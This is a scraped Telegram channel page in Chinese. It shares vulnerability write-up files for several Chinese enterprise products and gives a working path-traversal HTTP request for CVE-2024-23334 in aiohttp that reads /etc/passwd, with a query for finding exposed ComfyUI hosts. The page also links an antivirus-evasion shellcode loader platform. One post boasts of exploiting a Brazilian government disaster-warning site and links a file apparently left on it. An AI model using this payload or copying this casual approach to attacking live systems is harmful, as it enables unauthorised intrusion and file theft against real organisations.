踹哈公寓 – Telegram
踹哈公寓
@Oracleimpact
4.11K subscribers
589 photos
19 videos
307 files
357 links
一等情事

https://news.1rj.ru/str/chuaihagongyu
Download Telegram
About
Blog
Apps
Platform
Join
踹哈公寓
4.11K subscribers
踹哈公寓
🤣3👎1
2.11K views
踹哈公寓
宏景eHR_HCM_DisplayExcelCustomReport接口存在任意文件读取漏洞.docx
12.8 KB
2.07K views
踹哈公寓
用友U9-UMWebService.asmx存在文件读取漏洞.docx
13 KB
2.06K views
踹哈公寓
CVE-2024-23334 aiohttp 路径遍历漏洞

noscript=="ComfyUI"

GET /static/../../../../../etc/passwd HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip
2.24K views
踹哈公寓
RG_UAC锐捷统一上网行为管理与审计系统存在远程代码执行漏洞.docx
12.7 KB
2.23K views
踹哈公寓
RUOYI-v4.7.8存在远程代码执行漏洞.docx
996.7 KB
2.27K views
踹哈公寓
西软云XMS-futurehoteloperate接口存在XXE漏洞.docx
12.9 KB
2.23K views
踹哈公寓
https://atlasdigital.mdr.gov.br/paginas/1.txt

省流:为了更新仓库顺手打的,堂堂gov,(巴西国防部灾害预警中心)没有waf,不过滤危险函数,有2017年的古早cve

利用五分钟,解决√⑩的脚本crypto报错半个小时

真是一场酣畅淋漓的吃屎
😢3
2.63K viewsedited  
踹哈公寓
https://github.com/yutianqaq/AVEvasionCraftOnline
GitHub
GitHub - yutianqaq/AVEvasionCraftOnline: An online AV evasion platform written in Springboot (Golang, Nim, C) supports embedded…
An online AV evasion platform written in Springboot (Golang, Nim, C) supports embedded, local and remote loading of Shellocde methods. - yutianqaq/AVEvasionCraftOnline
2.81K views
踹哈公寓
https://mp.weixin.qq.com/s/BXtH58O7BdHeKfoB0dnX9A

再次证明了开发人员安全意识不够就别乱自己二改cms了,极其容易翻车
Weixin Official Accounts Platform
记一次若依站点简单渗透测试
记一次若依站点简单渗透测试。
2.25K viewsedited  
踹哈公寓
两会重保期间,频道暂停更新
😇13🌚3🤡1
2.33K views
踹哈公寓
踹哈公寓 pinned «两会重保期间,频道暂停更新»
踹哈公寓
Channel photo updated
踹哈公寓
Channel name was changed to «🤣👉🏻 🤡📱 👈🏻🤣»
踹哈公寓
🔥81
2.46K views
踹哈公寓
2.51K views